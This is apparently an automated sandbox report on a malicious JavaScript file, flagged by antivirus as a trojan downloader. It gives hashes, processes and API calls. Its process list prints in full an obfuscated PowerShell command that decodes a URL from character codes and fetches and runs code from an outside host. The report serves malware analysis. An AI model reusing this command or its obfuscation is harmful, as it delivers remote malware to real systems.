popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

CNOZ1237_3680420.js

  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Nov. 1, 2023, 9:42 a.m. Nov. 1, 2023, 9:44 a.m.
Size 620.9KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR, LF line terminators
MD5 8bc1516039ff6f4e48087ae01613c98a
SHA256 8b9a3a70b676420ce03d9e6fb4c61d8d5e1eb7d342bc64064e9410efd9f802f5
CRC32 905C7555
ssdeep 3072:e8GOE2sZO+rPAeukQ9PiLdhp2t/D84ytZhkdbBQsl817hDVsl+13kyI2cH0u6/zR:6
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\CNOZ1237_3680420.js

    2552

  • conhost.exe conhost --headless powershell $qvmkxbdtleof=(4161,4146,4163,4167,4164,4168,4147,4158,4092,4162,4157,4158,4093,4095,4092,4158,4150,4158,4109,4150,4143,4161,4150,4107);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $qvmkxbdtleof){$awi=$rob9e;$ftjxwlmqpdak=$ftjxwlmqpdak+[char]($awi-4046);$vizit=$ftjxwlmqpdak; $lira=$vizit};$nboukqlcagti[2]=$lira;$jwfblk='rl';$five=1;new-alias zwert cu$jwfblk;.$([char](9992-9887)+'ex')(zwert -useb $lira)

    2676

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Symantec Scr.Malcode!gen105
Kaspersky HEUR:Trojan-Downloader.Script.Generic
Time & API Arguments Status Return Repeated

IWbemServices_ExecMethod

 inargs.CurrentDirectory: None
inargs.CommandLine: time
inargs.ProcessStartupInformation: None
outargs.ProcessId: None
outargs.ReturnValue: 9
flags: 0
method: Create
class: Win32_Process
1 0 0